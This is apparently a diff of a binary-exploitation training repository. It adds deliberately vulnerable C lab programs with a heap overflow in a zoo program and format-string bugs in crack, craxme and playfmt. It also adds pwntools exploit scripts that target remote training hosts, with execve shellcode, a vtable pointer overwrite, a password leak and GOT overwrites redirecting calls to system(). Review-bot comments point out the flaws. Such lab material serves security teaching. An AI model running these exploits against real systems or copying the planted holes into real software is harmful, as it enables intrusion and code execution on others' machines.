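+setvbuf(stdin,0,2,0);
+cout << "Name of Your zoo :" ;
+read(0,nameofzoo,100);
+while(1){
+menu();
+cout << "Your choice :";
+cin >> choice ;
+cout << endl ;
+switch(choice){
+case 1 :
+adddog();
+break ;
+case 2 :
+addcat();
+break ;
+case 3 :
+listen();
+break ;
+case 4 :
+showinfo();
+break ;
+case 5 :
+remove();
+break ;
+case 6 :
+_exit(0);
+default :
+cout << "Invaild choice" << endl;
+break ;
+}
+}
+return 0 ;
+}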
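Review bot: The Dog and Cat constructors copy `str` into the 24-byte `name` with `strcpy(name,str.c_str())`, and adddog/addcat take that string from `cin >> name` with no length limit, so a longer name writes past the member and beyond the heap object. Bounding the copy, for example `snprintf(name, sizeof name, "%s", str.c_str());`, or storing a `std::string` removes the overflow; if it is the intended flaw, a comment on both constructors should say so. `Animal` has virtual functions but no virtual destructor, while remove() deletes through an `Animal *`. main() reads up to 100 bytes into `nameofzoo` with no room for a terminator, and the menu loop never checks `cin` for failure, so bad input makes it spin.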

41
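--- a/LAB/lab15/zoo.py
+++ b/LAB/lab15/zoo.py
@@ -0,0 +1,41 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+from pwn import *
+host = "training.angelboy.tw"
+port = 11015
+context.arch = "amd64"
+r = remote(host,port)
+sc = "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"
+def add_dog(name,weight):
+r.recvuntil(":")
+r.sendline("1")
+r.recvuntil(":")
+r.sendline(name)
+r.recvuntil(":")
+r.sendline(str(weight))
+def remove_ani(idx):
+r.recvuntil(":")
+r.sendline("5")
+r.recvuntil(":")
+r.sendline(str(idx))
+name = 0x605420
+r.recvuntil(":")
+r.sendline("a"*8 + p64(name+8) + sc)
+add_dog("a"*8,0)
+add_dog("b"*8,1)
+remove_ani(0)
+vptr = name + 8
+add_dog("a"*72 + p64(vptr),2)
+r.recvuntil(":")
+r.sendline("3")
+r.recvuntil(":")
+r.sendline("0")
+r.interactive()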

2
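--- a/LAB/lab7/Makefile
+++ b/LAB/lab7/Makefile
@@ -0,0 +1,2 @@
+crack:crack.c
+gcc -m32 crack.c -o crack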

BIN
LAB/lab7/crack Executable file

Binary file not shown.

29
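--- a/LAB/lab7/crack.c
+++ b/LAB/lab7/crack.c
@@ -0,0 +1,29 @@
+#include <stdio.h>
+#include <unistd.h>
+#include <time.h>
+#include <stdlib.h>
+unsigned int password ;
+int main(){
+setvbuf(stdout,0,2,0);
+char buf[100];
+char input[16];
+int fd ;
+srand(time(NULL));
+fd = open("/dev/urandom",0);
+read(fd,&password,4);
+printf("What your name ? ");
+read(0,buf,99);
+printf("Hello ,");
+printf(buf);
+printf("Your password :");
+read(0,input,15);
+if(atoi(input) != password){
+puts("Goodbyte");
+}else{
+puts("Congrt!!");
+system("cat /home/crack/flag");
+}
+}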
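Review bot: `printf(buf)` uses the name read from stdin as the format string, so conversion specifiers typed by the user are interpreted by printf; `printf("%s", buf);` prints it as data. The same call shape appears in craxme.c and in do_fmt() of playfmt.c; if it is the intended flaw of these labs, each call should carry a comment saying so. `buf` and `input` are filled by `read` and never terminated, `open` is used without `<fcntl.h>`, and neither its result nor the `read(fd,&password,4)` result is checked, so `password` silently stays 0 if /dev/urandom cannot be read. `atoi(input) != password` compares a signed `int` with an `unsigned int`, and the `srand(time(NULL))` call is unused.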

21
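--- a/LAB/lab7/crack.py
+++ b/LAB/lab7/crack.py
@@ -0,0 +1,21 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+from pwn import *
+host = "training.pwnable.tw"
+port = 11007
+r = remote(host,port)
+password_addr = 0x804a048
+r.recvuntil("?")
+r.sendline(p32(password_addr) + "#" + "%10$s" + "#" )
+r.recvuntil("#")
+p = r.recvuntil("#")
+password = u32(p[:4])
+r.recvuntil(":")
+r.sendline(str(password))
+r.interactive()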

2
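--- a/LAB/lab8/Makefile
+++ b/LAB/lab8/Makefile
@@ -0,0 +1,2 @@
+craxme:craxme.c
+gcc -m32 craxme.c -o craxme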

BIN
LAB/lab8/craxme Executable file

Binary file not shown.

20
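--- a/LAB/lab8/craxme.c
+++ b/LAB/lab8/craxme.c
@@ -0,0 +1,20 @@
+#include <stdio.h>
+int magic = 0 ;
+int main(){
+char buf[0x100];
+setvbuf(stdout,0,2,0);
+puts("Please crax me !");
+printf("Give me magic :");
+read(0,buf,0x100);
+printf(buf);
+if(magic == 0xda){
+system("cat /home/craxme/flag");
+}else if(magic == 0xfaceb00c){
+system("cat /home/craxme/craxflag");
+}else{
+puts("You need be a phd");
+}
+}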
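Review bot: Only `<stdio.h>` is included, yet main() calls `read` and `system`, so both are implicitly declared; add `#include <unistd.h>` and `#include <stdlib.h>`. `read(0,buf,0x100)` can fill all of `buf` and its return value is dropped, leaving no terminator for the print call that follows; reading `sizeof buf - 1` bytes and setting `buf[n] = '\0'` fixes that. `magic == 0xfaceb00c` compares an `int` with a constant that does not fit in `int`, so the comparison is done as unsigned; declaring `magic` as `unsigned int` states the intent.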

41
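--- a/LAB/lab8/craxme.py
+++ b/LAB/lab8/craxme.py
@@ -0,0 +1,41 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+from pwnpwnpwn import *
+from pwn import *
+#host = "10.211.55.28"
+#port = 8888
+host = "training.angelboy.tw"
+port = 11008
+r = remote(host,port)
+def fmt(prev,word,index):
+if prev < word :
+result = word - prev
+fmtstr = "%" + str(result) + "c"
+elif prev == word :
+result = 0
+else :
+result = 256 - prev + word
+fmtstr = "%" + str(result) + "c"
+fmtstr += "%" + str(index) + "$hhn"
+return fmtstr
+magic = 0x804a038
+payload = p32(magic)
+payload += p32(magic+1)
+payload += p32(magic+2)
+payload += p32(magic+3)
+targat = 0xfaceb00c
+prev = 4*4
+for i in range(4):
+payload += fmt(prev,(targat >> 8*i) & 0xff,7+i)
+prev = (targat >> 8*i) & 0xff
+r.recvuntil(":")
+r.sendline(payload)
+r.interactive()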

34
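--- a/LAB/lab8/craxme2.py
+++ b/LAB/lab8/craxme2.py
@@ -0,0 +1,34 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+from pwn import *
+host = "training.pwnable.tw"
+port = 11008
+r = remote(host,port)
+printf_got = 0x804a010
+puts_got = 0x804a018
+system_plt = 0x8048410
+target = 0x0804859b
+payload = p32(puts_got)
+payload += p32(puts_got+1)
+payload += p32(puts_got+2)
+payload += p32(puts_got+3)
+payload += p32(printf_got)
+payload += p32(printf_got+1)
+payload += p32(printf_got+2)
+payload += p32(printf_got+3)
+prev = 4*8
+for i in range(4):
+payload += fmtchar(prev,(target >> i*8) & 0xff,7+i)
+prev = (target >> i*8) & 0xff
+for i in range(4):
+payload += fmtchar(prev,(system_plt >> i*8) & 0xff,11+i)
+prev = (system_plt >> i*8) & 0xff
+r.recvuntil(":")
+r.sendline(payload)
+r.interactive()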

2
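--- a/LAB/lab9/Makefile
+++ b/LAB/lab9/Makefile
@@ -0,0 +1,2 @@
+playfmt:playfmt.c
+gcc -m32 playfmt.c -o playfmt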

BIN
LAB/lab9/playfmt Executable file

Binary file not shown.

29
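--- a/LAB/lab9/playfmt.c
+++ b/LAB/lab9/playfmt.c
@@ -0,0 +1,29 @@
+#include <stdio.h>
+#include <unistd.h>
+#include <string.h>
+char buf[200] ;
+void do_fmt(){
+while(1){
+read(0,buf,200);
+if(!strncmp(buf,"quit",4))
+break;
+printf(buf);
+}
+return ;
+}
+void play(){
+puts("=====================");
+puts(" Magic echo Server");
+puts("=====================");
+do_fmt();
+return;
+}
+int main(){
+setvbuf(stdout,0,2,0);
+play();
+return;
+}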
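Review bot: main() is declared `int` but ends with a bare `return;`, which C99 and later do not allow in a function returning a value; it should be `return 0;`. In do_fmt() the result of `read(0,buf,200)` is ignored, so end-of-input or an error leaves the loop spinning on stale data, and a full 200-byte read leaves `buf` unterminated. Breaking when the result is `<= 0`, reading at most `sizeof buf - 1` bytes and setting `buf[n] = '\0'` covers both.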